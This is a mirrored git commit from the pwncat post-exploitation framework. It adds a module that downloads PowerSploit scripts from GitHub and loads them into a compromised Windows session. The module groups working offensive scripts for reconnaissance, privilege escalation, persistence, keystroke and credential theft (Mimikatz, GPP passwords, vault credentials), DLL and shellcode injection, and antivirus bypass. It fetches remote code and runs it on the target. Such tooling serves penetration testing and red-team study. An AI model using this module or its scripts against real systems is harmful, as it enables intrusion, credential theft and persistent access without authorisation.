1
0
mirror of https://github.com/calebstewart/pwncat.git synced 2024-11-27 02:44:14 +01:00

Added powersploit module

This should cover all of the powersploit PowerShell scripts available on
the Github repository. They're loaded in groups, but individual scripts
could still be loaded by URL w/ `manage.powershell.import` if needed.
This commit is contained in:
Caleb Stewart 2021-06-03 21:58:16 -04:00
parent 8773c64afb
commit b787772c68
3 changed files with 115 additions and 2 deletions

1
.gitignore vendored
View File

@ -14,4 +14,3 @@ pwncat.sqlite-journal
linpeas.txt linpeas.txt
NOTES.md NOTES.md
db/pwncat* db/pwncat*
windows/

View File

@ -4,6 +4,7 @@ from io import IOBase, BytesIO
from pathlib import Path from pathlib import Path
import requests import requests
from pwncat.modules import Bool, Argument, BaseModule, ModuleFailed from pwncat.modules import Bool, Argument, BaseModule, ModuleFailed
from pwncat.platform.windows import Windows from pwncat.platform.windows import Windows
@ -61,7 +62,7 @@ class Module(BaseModule):
if r.status_code != 200: if r.status_code != 200:
raise PSModuleNotFoundError(orig_path) raise PSModuleNotFoundError(orig_path)
return (path.name, BytesIO(r.content)) return (path.name, BytesIO(r.content + "\n"))
else: else:
raise PSModuleNotFoundError(orig_path) raise PSModuleNotFoundError(orig_path)

View File

@ -0,0 +1,113 @@
#!/usr/bin/env python3
from pwncat.modules import Result, Status, Argument, BaseModule, ModuleFailed
from pwncat.platform.windows import Windows, PowershellError
class GroupInfo(Result):
def __init__(self, name: str):
self.name = name
def category(self, session: "pwncat.manager.Session"):
return "PowerSploit Module Groups"
def title(self, session: "pwncat.manager.Session"):
return f"[cyan]{self.name}[/cyan]"
def __str__(self):
return self.name
class Module(BaseModule):
"""
Load and execute modules from the PowerSploit PowerShell library. Modules are loaded in
groups referring to the directory structure of PowerSploit. Passing no arguments to this
module will list all available groups. Modules are downloaded directly from GitHub and
sideloaded to the target.
The PowerSploit source can be seen at https://github.com/PowerShellMafia/PowerSploit
"""
MODULES = {
"recon": [
"Recon/Get-ComputerDetail.ps1",
"Recon/Get-HttpStatus.ps1",
"Recon/Invoke-CompareAttributesForClass.ps1",
"Recon/Invoke-Portscan.ps1",
"Recon/Invoke-ReverseDnsLookup.ps1",
"Recon/PowerView.ps1",
],
"privesc": [
"Privesc/PowerUp.ps1",
"Privesc/Get-System.ps1",
],
"persist": [
"Persistence/Persistence.psm1",
],
"mayhem": [
"Mayhem/Mayhem.psm1",
],
"exfil": [
"Exfiltration/Get-GPPAutologon.ps1",
"Exfiltration/Get-GPPPassword.ps1",
"Exfiltration/Get-Keystrokes.ps1",
"Exfiltration/Get-MicrophoneAudio.ps1",
"Exfiltration/Get-TimedScreenshot.ps1",
"Exfiltration/Get-VaultCredential.ps1",
"Exfiltration/Invoke-CredentialInjection.ps1",
"Exfiltration/Invoke-Mimikatz.ps1",
"Exfiltration/Invoke-NinjaCopy.ps1",
"Exfiltration/Invoke-TokenManipulation.ps1",
"Exfiltration/Out-Minidump.ps1",
"Exfiltration/VolumeShadowCopyTools.ps1",
],
"exec": [
"CodeExecution/Invoke-DllInjection.ps1",
"CodeExecution/Invoke-ReflectivePEInjection.ps1",
"CodeExecution/Invoke-Shellcode.ps1",
"CodeExecution/Invoke-WmiCommand.ps1",
],
"bypass": [
"AntivirusBypass/Find-AVSignature.ps1",
],
"script": [
"ScriptModification/Out-CompressedDll.ps1",
"ScriptModification/Out-EncodedCommand.ps1",
"ScriptModification/Out-EncryptedScript.ps1",
"ScriptModification/Remove-Comment.ps1",
],
}
POWERSPLOIT_URL = (
"https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/"
)
PLATFORM = [Windows]
ARGUMENTS = {
"group": Argument(
str,
default="list",
help="Name of the PowerSploit module group to load (default: list groups)",
),
}
POWERUP_URL = "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1"
def run(self, session: "pwncat.manager.Session", group: str):
# Use the result system so that other modules can query available groups
if group == "list":
yield from (GroupInfo(name) for name in self.MODULES.keys())
return
# Ensure the user selected a valid group
if group not in self.MODULES:
raise ModuleFailed(f"no such PowerSploit module: {group}")
# Iterate over all sources in the group
for url in self.MODULES[group]:
yield Status(f"loading {url.split('/')[-1]}")
try:
# Attempt to load the script in the PowerShell context.
session.run("manage.powershell.import", path=self.POWERSPLOIT_URL + url)
except PowershellError as exc:
# We failed, but continue loading other scripts. Just let the user know.
session.log(f"while loading {url.split('/')[-1]}: {str(exc)}")